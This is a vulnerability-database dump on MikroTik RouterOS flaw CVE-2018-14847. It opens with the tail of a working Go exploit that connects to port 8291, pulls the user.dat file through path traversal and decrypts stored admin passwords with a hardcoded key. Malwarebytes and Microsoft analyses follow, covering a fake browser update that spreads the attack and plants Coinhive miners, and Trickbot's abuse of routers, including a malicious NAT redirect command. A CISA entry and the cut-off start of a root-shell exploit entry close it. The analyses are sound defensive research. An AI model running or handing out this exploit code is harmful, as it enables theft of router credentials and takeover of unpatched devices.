\n0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, \n0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, \n0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66, \n0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f, \n0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73, \n0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00, \n0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88, \n0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, \n0x00, 0x00} \n \nb = []byte{0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00, \n0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01, \n0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08, \n0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09, \n0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01, \n0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00, \n0x00, 0x02, 0x00, 0x00, 0x00} \n \nbuf = make([]byte, 1024*8) \n) \n \nfunc checkErr(err error) { \nif err != nil { \nfmt.Println(\"Error:\" + err.Error()) \n} \n} \n \nfunc decryptPassword(user []byte, passEnc []byte) string { \nvar passw []byte \nhasher := md5.New() \nhasher.Write(user) \nhasher.Write([]byte(\"283i4jfkai3389\")) \nkey := hasher.Sum(nil) \n \nfor i := 0; i < len(passEnc); i++ { \npassw = append(passw, passEnc[i]^key[i%len(key)]) \n} \n \nreturn string(ASCIIonly(passw)) \n} \n \nfunc ASCIIonly(s []byte) []byte { \nfor i, c := range s { \nif c < 32 || c > 126 { \nreturn s[:i] \n} \n} \nreturn s \n} \n \nfunc extractPass(buff []byte) (s []string) { \nvar ( \nusr []byte \npwd []byte \n) \n \n//searching for StartOfRecord \nfor i := 0; i < len(buff); i++ { \n \nif i+2 >= len(buff) { \nbreak \n} \n \nif (buff[i] == 0x4d) && (buff[i+1] == 0x32) && (buff[i+2] == 0x0a || buff[i+2] == 0x10) { \n// fmt.Printf(\"Probably user record at offset 0x%.5x\\n\", i) \n \n//some bytes ahead is enable/disable flag \ni += int((buff[i+2] - 5)) \nif i >= len(buff) { \nbreak \n} \n \n//searching for StartOfRecNumber \nif i+3 >= len(buff) { \nbreak \n} \n \nfor !((buff[i] == 0x01) && ((buff[i+1] == 0x00) || (buff[i+1] == 0x20)) && (buff[i+3] == 0x09 || buff[i+3] == 0x20)) { \ni++ \nif i+3 >= len(buff) { \nbreak \n} \n} \n \ni += 4 \nif i >= len(buff) { \nbreak \n} \n// fmt.Printf(\"SORn: 0x%X\\n\", i) \n \n// comment? \ni += 18 \nif (i + 4) >= len(buff) { \nbreak \n} \nif (!((buff[i+1] == 0x11) && (buff[i+2] == 0x20) && (buff[i+3] == 0x20) && (buff[i+4] == 0x21))) && (buff[i-5] == 0x03 && (buff[i] != 0x00)) { \nif (i+1)+int(buff[i]) >= len(buff) { \nbreak \n} \ni += int(buff[i]) \n} else { \ni -= 18 \n} \n \n//searching for StartOfPassword \nif i+4 >= len(buff) { \nbreak \n} \n \nfor !((buff[i] == 0x11) && (buff[i+3] == 0x21) && ((buff[i+4] % byte(0x10)) == 0)) { \ni++ \nif i+4 >= len(buff) { \nbreak \n} \n} \ni += 5 \nif (i + 3) >= len(buff) { \nbreak \n} \n \nif (buff[i-1] != 0x00) && !((buff[i] == 0x01) && ((buff[i+1] == 0x20 && buff[i+2] == 0x20) || (buff[i+1] == 0x00 && buff[i+2] == 0x00)) && (buff[i+3] == 0x21)) { \npwd = buf[i-1+1 : int(buf[i-1])+i-1+1] \ni += int(buff[i-1]) \n} \n \n//searching for StartOfUsername \nif i+3 >= len(buff) { \nbreak \n} \nfor !((buff[i] == 0x01) && (buff[i+3] == 0x21)) { \ni++ \nif i+3 >= len(buff) { \nbreak \n} \n} \n \ni += 4 \nif i >= len(buff) { \nbreak \n} \nif buff[i] != 0x00 { \nif i+int(buff[i]) >= len(buff) { \nbreak \n} \n \nusr = ASCIIonly(buff[i+1 : int(buff[i])+i+1]) \ni += int(buff[i]) \n} \n \ndecrypted := decryptPassword(usr, pwd) \n//fmt.Printf(\" --> %s\\t%s\\n\", buff[i], decrypted) \n \nif len(usr) != 0 { \ns = append(s, strings.Join([]string{string(usr), string(decrypted)}, \":\")) \n} \n \n} \n} \n \nreturn s \n} \n \nfunc main() { \n \nif len(os.Args) < 2 { \nfmt.Printf(\" [ usage: %s 192.168.88.1\\n\\n\", os.Args[0]) \nos.Exit(0) \n} \n \nconn, err := net.DialTimeout(\"tcp\", os.Args[1]+\":8291\", time.Duration(3*time.Second)) \n \nif err != nil { \nfmt.Println(err.Error()) \nreturn \n} \n \ndefer conn.Close() \n \nconn.Write(a) \nreqLen, err := conn.Read(buf) \ncheckErr(err) \nif reqLen < 38 { \npanic(\"First packet is too small\") \n} \n \nb[19] = buf[38] \n \nconn.Write(b) \nreqLen, err = conn.Read(buf) \ncheckErr(err) \ndb := buf[:reqLen] \n \ns := extractPass(db) \nfor i, acc := range s { \ndata := strings.SplitN(acc, \":\", 2) \nfmt.Printf(\" [%d] %s\\t%s\\n\", i, data[0], data[1]) \n} \n} \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148958/mikrotikwinbox642-disclose.txt"}], "malwarebytes": [{"lastseen": "2018-10-15T22:23:26", "description": "_This blog post was authored by [@hasherezade](<https://twitter.com/hasherezade>) and [J\u00e9r\u00f4me Segura](<https://blog.malwarebytes.com/author/jeromesegura/>)._\n\nMikroTik, a Latvian company that makes routers and ISP wireless systems, has been dealing with several vulnerabilities affecting its products' operating system over the past few months. Ever since a critical flaw in RouterOS was [identified](<https://forum.mikrotik.com/viewtopic.php?t=133533>) in late April 2018, attacks have been going on at an alarming rate, made worse when a newly-found exploitation technique for [CVE-2018-14847](<https://www.exploit-db.com/exploits/45578/>) was identified.\n\nThe problem is that a large number of MikroTik routers remain unpatched and are prey for automated attacks, despite security fixes made available by the vendor. Criminals were quick to leverage Proof of Concept code to compromise hundreds of thousands of devices in a short time frame. Last summer, researchers at SpiderLabs [discovered](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Mass-MikroTik-Router-Infection-%E2%80%93-First-we-cryptojack-Brazil,-then-we-take-the-World-/>) what was perhaps the biggest malicious Coinhive campaign via hacked MikroTik devices, which has evolved into a much wider problem now.\n\nWith this latest trick, users behind compromised routers are served a fake browser update page. When they run this malicious update, it unpacks code onto their computer that scans the Internet for other vulnerable routers and tries to exploit them.\n\n### Suspicious browser update\n\nSecurity researcher [@VriesHd](<https://twitter.com/VriesHd>) first spotted a new [campaign](<https://twitter.com/VriesHd/status/1049775664235208706>) attempting to further compromise vulnerable routers using a typical social engineering technique. Internet providers that operate infected MikroTik routers will serve this malicious redirect about an \"old version of the browser\" to their end users:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/fake_update.png> \"\" )\n\nAccording to a [search via Censys](<https://censys.io/ipv4?q=%22During+the+opening+of+the+site%22+AND+%22MikroTik+Device%22>), there are about 11,000 compromised MikroTik devices hosting this fake download page:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/censys_results.png> \"\" )\n\nThe alleged browser update is suspiciously downloaded from an FTP server, as seen below:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/sourcecode.png> \"\" )\n\nInterestingly, this IP address is also listed as a free and open web proxy. Proxies are often used by those who wish to bypass certain country limitations (i.e. watching the American version of Netflix if you are not in the US) or simply as a way to mask their IP address.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/free_proxy.png> \"\" )\n\n### Payload analysis\n\n**Behavioral analysis**\n\nThe payload follows the theme of pretending to be an installer named _upd_browser_.\n\n\n\nWhen we deploy it, it pops up an error:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/error_popup_.png> \"\" )\n\nHowever, if we capture the network traffic, we can see that in the background it scans various IP addresses, trying to connect on port 8291 ([a default port for managing MicroTik routers via Winbox application](<http://whatportis.com/ports/8291_winbox-default-on-a-mikrotik-routeros-for-a-windows-application-used-to-administer-mikrotik-routeros>)):\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/probing.png> \"\" )\n\n**Unpacking**\n\nThe dropped payload is a relatively big executable (7.25 MB) with a huge overlay. The sections' headers and their visualizations are given below:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/sections_.png> \"\" )\n\nAs we can recognize by looking at the sections names, it comes packed by a popular, simple packer: [UPX](<https://upx.github.io/>). The size of overlay suggests that there is something more to be extracted. After further examination, we find out that it unpacks a Python DLL and other related files into the %TEMP% folder, and then loads them. At this point, it is easy to guess that this EXE is in reality a wrapped Python script. We can unpack it following the same procedure as the one described [here](<https://hshrzd.wordpress.com/2018/01/26/solving-a-pyinstaller-compiled-crackme/>).\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/extracted_.png> \"\" )\n\nThe Entry Point is in the script named _upd_browser_. After decompiling and following the scripts, we find out that the malware's core consists of two Python scripts: [upd_browser.py](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-upd_browser-py>) and [ups.py](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-ups-py>).\n\n**Inside the scripts**\n\nThe [main function of the module](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-upd_browser-py-L95>) is pretty simple:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/main_func_.png> \"\" )\n\nAs we can see, [the error pop-up is hardcoded](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-upd_browser-py-L97>): It does not alert about any actual error, but is used as a decoy.\n\nAfter that, the malware logs the IP address of the victim by querying a hardcoded address of a tracker made using a legitimate service, IP Logger. The tracker takes the form of a one pixel\u2013sized image:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/iplogger_.png> \"\" )\n\nLater, this address is queried repeatedly in a defined time interval.\n\nThe most important actions are performed in the function named \"[scan](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-upd_browser-py-L75>)\" that is deployed in several parallel threads (the maximum number of threads is defined as thmax = 600). The function \"[scan](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-upd_browser-py-L75>)\" generates pseudo-random IP addresses and tries to connect to each of them on the aforementioned port 8291. When the attempt of connecting is successful, it tries another connection, this time on a random port from a range of 56778 to 56887. When this one fails, it proceeds with the exploitation: \n\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/scan_addrs_.png> \"\" )\n\nThe function \"[poc](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-upd_browser-py-L5>)\" is meant to infect the router using known vulnerabilities. It starts by attempting to retrieve credentials leveraging the path traversal vulnerability (CVE-2018-14847):\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/get_user_pass_.png> \"\" )\n\nThe user.dat file is expected to be in M2 format, so the script comes with a built-in parser (function [load_file](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-ups-py-L117>)):\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/m2_parser_fragment-1.png> \"\" )\n\nIf retrieving the password from user.dat file is successful, it decodes the credentials and uses them to create a backdoor: an account with a randomly-generated password. It also sets a scheduled task to be executed by the router.\n\nThe script that is set in the scheduler is generated from a hardcoded [template](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-ups-py-L30>) (cleaned version available [here](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-script_template-txt>)). Its role is to manipulate the router's settings and set up an error page [loading a CoinHive](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-script_template-txt-L41>) miner.\n\nThe error page can be dropped in two locations: \"[webproxy/error.html](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-script_template-txt-L42>)\" or \"[flash/webproxy/error.html](<https://gist.github.com/malwarezone/e437bb06d0d19a2d02ffd98cffe2b2c4#file-script_template-txt-L43>)\" .\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/proxy_view.png> \"\" )\n\nSuch a page is displayed to users whenever they try to view a URL to which the access is denied. But the malicious script configured in the router in such a way that basically any HTTP request leads to the error. Yet, the error page is crafted to spoof the original traffic, displaying the requested page as an iframe. So, users may browse most of the web as usual, without noticing the change. Example:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/coinhive_.png> \"\" )\n\nThe CoinHive miner is embedded, so during the time this time their machines are used for mining purposes.\n\n### Mitigations\n\nMikroTik users are urged to patch their routers as soon as possible and should assume that their authentication credentials have been compromised if they are running an outdated version. MikroTik's [download page](<https://mikrotik.com/download>) explains how to perform an upgrade to RouterOS.\n\nA [blog post](<https://blog.mikrotik.com/security/winbox-vulnerability.html>) from the company about CVE-2018-14847 also advises users to restrict access to Winbox via the Firewall and make sure the configuration file is clean (this is usually where scripts or proxies would be injected).\n\nAwareness that these vulnerabilities exist and are easy to exploit is important considering that patching a router is not something many people are used to doing. However, in many cases users will not be able to do so unless their Internet Service Provider does it for them upstream.\n\nWith this latest social engineering scheme, we saw how criminals are trying to infect regular users and leverage their computer to scan the Internet for vulnerable routers. This technique is clever because such an effort requires time and resources to be efficient.\n\nMalwarebytes business customers and Premium consumer users are protected from this threat, as our anti-malware engine detects and blocks this fake browser update in real time:\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2018/10/detection.png> \"\" )\n\nMalwarebytes Endpoint Protection blocks the malicious executable disguised as a browser update.\n\n### Indicators of compromise\n\nSample hash\n \n \n 57EB8C673FC6A351B8C15310E507233860876BA813ED6AC633E9AF329A0BBAA0\n\nCoinhive site keys\n \n \n oiKAGEslcNfjfgxTMrxKGMJvh436ypIM\n 5zHUikiwJT4MLzQ9PLbU11gEz8TLCcYx\n 5ROof564mEBQsYzCqee0M2LplLBEApCv\n qKoXV8jXlcUaIt0LGcMJIHw7yLJEyyVO\n ZsyeL0FvutbhhdLTVEYe3WOnyd3BU1fK\n ByMzv397Mzjcm4Tvr3dOzD6toK0LOqgf\n joy1MQSiGgGHos78FarfEGIuM5Ig7l8h\n ryZ1Dl4QYuDlQBMchMFviBXPL1E1bbGs\n jh0GD0ZETDOfypDbwjTNWXWIuvUlwtsF\n BcdFFhSoV7WkHiz9nLmIbHgil0BHI0Ma\n\nThe post [Fake browser update seeks to compromise more MikroTik routers](<https://blog.malwarebytes.com/threat-analysis/2018/10/fake-browser-update-seeks-to-compromise-more-mikrotik-routers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2018-10-12T15:00:06", "type": "malwarebytes", "title": "Fake browser update seeks to compromise more MikroTik routers", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2018-10-12T15:00:06", "id": "MALWAREBYTES:1437FF0825AD10F9D61ABFE429326967", "href": "https://blog.malwarebytes.com/threat-analysis/2018/10/fake-browser-update-seeks-to-compromise-more-mikrotik-routers/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "mssecure": [{"lastseen": "2022-03-16T15:26:57", "description": "Trickbot, a sophisticated trojan that has evolved significantly since its discovery in 2016, has continually expanded its capabilities and, even with [disruption efforts](<https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/>) and news of its infrastructure going offline, it has managed to remain one of the most persistent threats in recent years. The malware\u2019s modular nature has allowed it to be increasingly adaptable to different networks, environments, and devices. In addition, it has grown to include numerous plug-ins, access-as-a-service backdoors for other malware like Ryuk ransomware, and mining capabilities. A significant part of its evolution also includes making its attacks and infrastructure more durable against detection, including continuously improving its persistence capabilities, [evading researchers and reverse engineering](<https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/>), and finding new ways to maintain the stability of its command-and-control (C2) framework.\n\nThis continuous evolution has seen Trickbot expand its reach from computers to Internet of Things (IoT) devices such as routers, with the malware updating its C2 infrastructure to [utilize MikroTik devices and modules](<https://orangecyberdefense.com/uk/blog/cyberdefense/the-trickbot-and-mikrotik-connection/>). [MikroTik](<https://mikrotik.com/>) routers are widely used around the world across different industries. By using MikroTik routers as proxy servers for its C2 servers and redirecting the traffic through non-standard ports, Trickbot adds another persistence layer that helps malicious IPs evade detection by standard security systems.\n\nThe Microsoft Defender for IoT research team has recently discovered the exact method through which MikroTik devices are used in Trickbot\u2019s C2 infrastructure. In this blog, we will share our analysis of the said method and provide insights on how attackers gain access to MikroTik devices and use compromised IoT devices in Trickbot attacks.\n\nThis analysis has enabled us to develop a forensic tool to identify Trickbot-related compromise and other suspicious indicators on MikroTik devices. We [published this tool](<https://github.com/microsoft/routeros-scanner>) to help customers ensure these IoT devices are not susceptible to these attacks. We\u2019re also sharing recommended steps for detection and remediating compromise if found, as well as general prevention steps to protect against future attacks.\n\n_Figure 1. Trickbot attack diagram_\n\n## How attackers compromise MikroTik devices for Trickbot C2\n\nThe purpose of Trickbot for using MikroTik devices is to create a line of communication between the Trickbot-affected device and the C2 server that standard defense systems in the network are not able to detect. The attackers begin by hacking into a MikroTik router. They do this by acquiring credentials using several methods, which we will discuss in detail in the following section.\n\nThe attackers then issue a unique command that redirects traffic between two ports in the router, establishing the line of communication between Trickbot-affected devices and the C2. MikroTik devices have unique hardware and software, RouterBOARD and RouterOS. This means that to run such a command, the attackers need expertise in RouterOS SSH shell commands. We uncovered this attacker method by tracking traffic containing these SSH shell commands.\n\n_Figure 2. Direct line of communication between the Trickbot infected device and the Trickbot C2_\n\n### Accessing the MikroTik device and maintaining access\n\nAttackers first need to access the MikroTik shell to run the routing commands. To do so, they need to acquire credentials. As mentioned earlier, based on our analysis, there are several methods that attackers use to access a target router:\n\n * **Using default ****MikroTik passwords.**\n * **Launching brute force attacks.** We have seen attackers use some unique passwords that probably were harvested from other MikroTik devices.\n * **Exploiting CVE-2018-14847 on devices with RouterOS versions older than 6.42. **This vulnerability gives the attacker the ability to read arbitrary files like _user.dat_, which contains passwords.\n\nTo maintain access, the attackers then change the affected router\u2019s password.\n\n### Redirecting traffic\n\nMikroTik devices have a unique Linux-based OS called RouterOS with a unique SSH shell that can be accessed through SSH protocol using a restricted set of commands. These commands can be easily identified by the prefix \u201c/\u201d. For example:\n \n \n /ip \n /system \n /tool\n\nThese commands usually won\u2019t have any meaning on regular Linux-based shells and are solely intended for MikroTik devices. We observed through Microsoft threat data the use of these types of commands. Understanding that these are MikroTik-specific commands, we were able to track their source and intent. For example, we observed attackers issuing the following commands:\n \n \n /ip firewall nat add chain=dstnat proto=tcp dst-port=449 to-port=80 action=dst-nat to-addresses=<infected device> dst-address=<real C2 address>\n\nFrom the command, we can understand the following:\n\n * A new rule, similar to iptables, is created\n * The rule redirects traffic from the device to a server\n * The redirected traffic is received from port 449 and redirected to port 80\n\nThe said command is a legitimate network address translation (NAT) command that allows the NAT router to perform IP address rewriting. In this case, it is being used for malicious activity. Trickbot is known for using ports 443 and 449, and we were able to verify that some target servers were identified as TrickBot C2 servers in the past.\n\nThis analysis highlights the importance of keeping IoT devices secure in today\u2019s ever evolving threat environment. Using Microsoft threat data, Microsoft\u2019s IoT and operational technology (OT) security experts established the exact methods that attackers use to leverage compromised IoT devices and gained knowledge that can help us better protect customers from threats.\n\n## Defending IoT devices against Trickbot attacks\n\nAs security solutions for conventional computing devices continue to evolve and improve, attackers will explore alternative ways to compromise target networks. Attack attempts against routers and other IoT devices are not new, and being unmanaged, they can easily be the weakest links in the network. Therefore, organizations should also consider these devices when implementing security policies and best practices.\n\n### An open-source tool for MikroTik forensics\n\nWhile investigating MikroTik and attacks in the wild, we observed several methods of attacking these devices in addition to the method we described in this blog. We aggregated our knowledge of these methods and known CVEs into an open-source tool that can extract the forensic artifacts related to these attacks.\n\nSome of this tool\u2019s functionalities include the following:\n\n * Get the version of the device and map it to CVEs\n * Check for scheduled tasks\n * Look for traffic redirection rules (NAT and other rules)\n * Look for DNS cache poisoning\n * Look for default ports change\n * Look for non-default users\n\nWe have [published the tool in GitHub](<https://github.com/microsoft/routeros-scanner>) and are sharing this tool with the broader community to encourage better intelligence-sharing in the field of IoT security and to help build better protections against threat actors abusing IoT devices.\n\n### How to detect, remediate, and prevent infections\n\nOrganizations with potentially at-risk MikroTik devices can perform the following detection and remediation steps:\n\n * Run the following command to detect if the NAT rule was applied to the device (completed by the tool as well):\n \n \n /ip firewall nat print\n\nIf the following data exists, it might indicate infection:\n \n \n chain=dstnat action=dst-nat to-addresses=<public IP address> \n to-ports=80 protocol=tcp dst-address=<your MikroTik IP> dst-port=449 \n chain=srcnat action=masquerade src-address=<your MikroTik IP>\n\n * Run the following command to remove the potentially malicious NAT rule:\n \n \n /ip firewall nat remove numbers=<rule number to remove>\n\nTo prevent future infections, perform the following steps:\n\n * Change the default password to a strong one\n * Block port 8291 from external access\n * Change SSH port to something other than default (22)\n * Make sure routers are up to date with the latest firmware and patches\n * Use a secure virtual private network (VPN) service for remote access and restrict remote access to the router\n\n### Protect IoT devices and IT networks with Microsoft Defender\n\nTo harden IoT devices and IT networks against threats like Trickbot, organizations must implement solutions that detect malicious attempts to access devices and raises alerts on anomalous network behavior. [Microsoft Defender for IoT](<https://azure.microsoft.com/services/iot-defender/>) provides agentless, network-layer security that lets organizations deploy continuous asset discovery, vulnerability management, and threat detection for IoT, OT devices, and Industrial Control Systems (ICS) on-premises or in Azure-connected environments. It is updated regularly with indicators of compromise (IoCs) from threat research like the one described on this blog, and rules to detect malicious activity.\n\nMeanwhile, [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>) protects against attacks related to highly modular, multi-stage malware like Trickbot by coordinating threat data across identities, endpoints, cloud apps, email, and documents. Such cross-domain visibility allows Microsoft 365 Defender to comprehensively detect and remediate Trickbot\u2019s end-to-end attack chain\u2014from malicious attachments and links it sends via emails to its follow-on activities in endpoints. Its rich set of tools like [advanced hunting](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/advanced-hunting-overview?view=o365-worldwide>) also lets defenders surface threats and gain insights for hardening networks from compromise.\n\nIn addition, working with the Microsoft Defender for IoT Research Team, RiskIQ identified compromised MikroTik routers acting as communication channels for Trickbot C2 and created detection logic to flag devices under threat actor control. [See RiskIQ\u2019s article](<https://community.riskiq.com/article/111d6005>).\n\nTo learn more about securing your IoT and OT devices, explore [Microsoft Defender for IoT](<https://azure.microsoft.com/services/iot-defender/>).\n\n**_David Atch_**_, Section 52 at Microsoft Defender for IoT_ \n**_Noa Frumovich_**_, Section 52 at Microsoft Defender for IoT_ \n**_Ross Bevington_**_, Microsoft Threat Intelligence Center (MSTIC)_\n\nThe post [Uncovering Trickbot\u2019s use of IoT devices in command-and-control infrastructure](<https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2022-03-16T15:00:00", "type": "mssecure", "title": "Uncovering Trickbot\u2019s use of IoT devices in command-and-control infrastructure", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2022-03-16T15:00:00", "id": "MSSECURE:B4569A8CBDA7CA5A51F286861830C71B", "href": "https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-12-01T00:00:00", "type": "cisa_kev", "title": "MikroTik Router OS Directory Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2021-12-01T00:00:00", "id": "CISA-KEV-CVE-2018-14847", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "zdt": [{"lastseen": "2021-11-08T03:48:07", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2018-10-10T00:00:00", "type": "zdt", "title": "MicroTik RouterOS < 6.43rc3 - Remote Root Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2018-10-10T00:00:00", "id": "1337DAY-ID-31296", "href": "https://0day.today/exploit/description/31296", "sourceData": "/*\n# Exploit Title: RouterOS Remote Rooting\n# Exploit Author: Jacob Baines\n# Vendor Homepage: www.mikrotik.com\n# Software Link: https://mikrotik.com/download\n# Version: Longterm: 6.30.1 - 6.40.7 Stable: 6.29 - 6.42 Beta: 6.29rc1 - 6.43rc3\n# Tested on: RouterOS Various\n# CVE : CVE-2018-14847\n \nBy the Way is an exploit coded in C++ that enables a root shell on Mikrotik devices running RouterOS versions:\n \nLongterm: 6.30.1 - 6.40.7\nStable: 6.29 - 6.42\nBeta: 6.29rc1 - 6.43rc3\n \nThe exploit can be found here: 